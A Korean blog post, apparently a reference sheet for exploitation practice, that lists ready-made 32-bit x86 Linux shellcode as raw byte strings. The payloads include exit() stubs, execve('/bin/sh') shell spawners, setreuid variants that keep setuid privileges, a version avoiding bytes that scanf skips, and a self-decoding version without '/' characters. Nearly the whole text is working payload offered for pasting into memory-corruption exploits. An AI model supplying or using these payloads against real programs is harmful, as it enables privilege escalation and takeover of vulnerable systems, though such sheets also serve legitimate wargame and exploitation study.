[쉘 코드]
- 6바이트 코드 exit() 코드
\x31\xc0\xb0\x01\xcd\x80
- 16바이트 코드 setreuid(geteuid(),geteuid()) 코드
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80
- 25바이트 코드 일반적인 쉘코드
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80
- 26바이트 코드 scanf로 입력받을 경우 사용 (scanf는 \x09, \x0a, \x0b, \x0c, \x0d, \x20를 읽지 못함)
\x31\xc0\x50\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x31\xc9\x31\xd2\xb0\x08\x40\x40\x40\xcd\x80
- 31바이트 코드 exit() 포함
\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
- 47바이트 코드 setreuid(geteuid(),geteuid()), exit() 포함
\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80
- 48바이트 코드 %27(/)없는 코드
\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81
'Security_ > etc' 카테고리의 다른 글
| [운영체제] 인터럽트 벡터(Interrupt Vector) / 인터럽트 벡터 테이블 (Interrupt Vector Table) (1) | 2021.09.27 |
|---|---|
| [Linux] vim 설치 및 설정 (0) | 2019.10.16 |
| [etc] Stack? (0) | 2018.10.01 |
| [etc] 빅/리틀 엔디언 #비교 (0) | 2018.08.24 |
| [etc] 메모리(Memory) 구조 (0) | 2018.04.29 |
댓글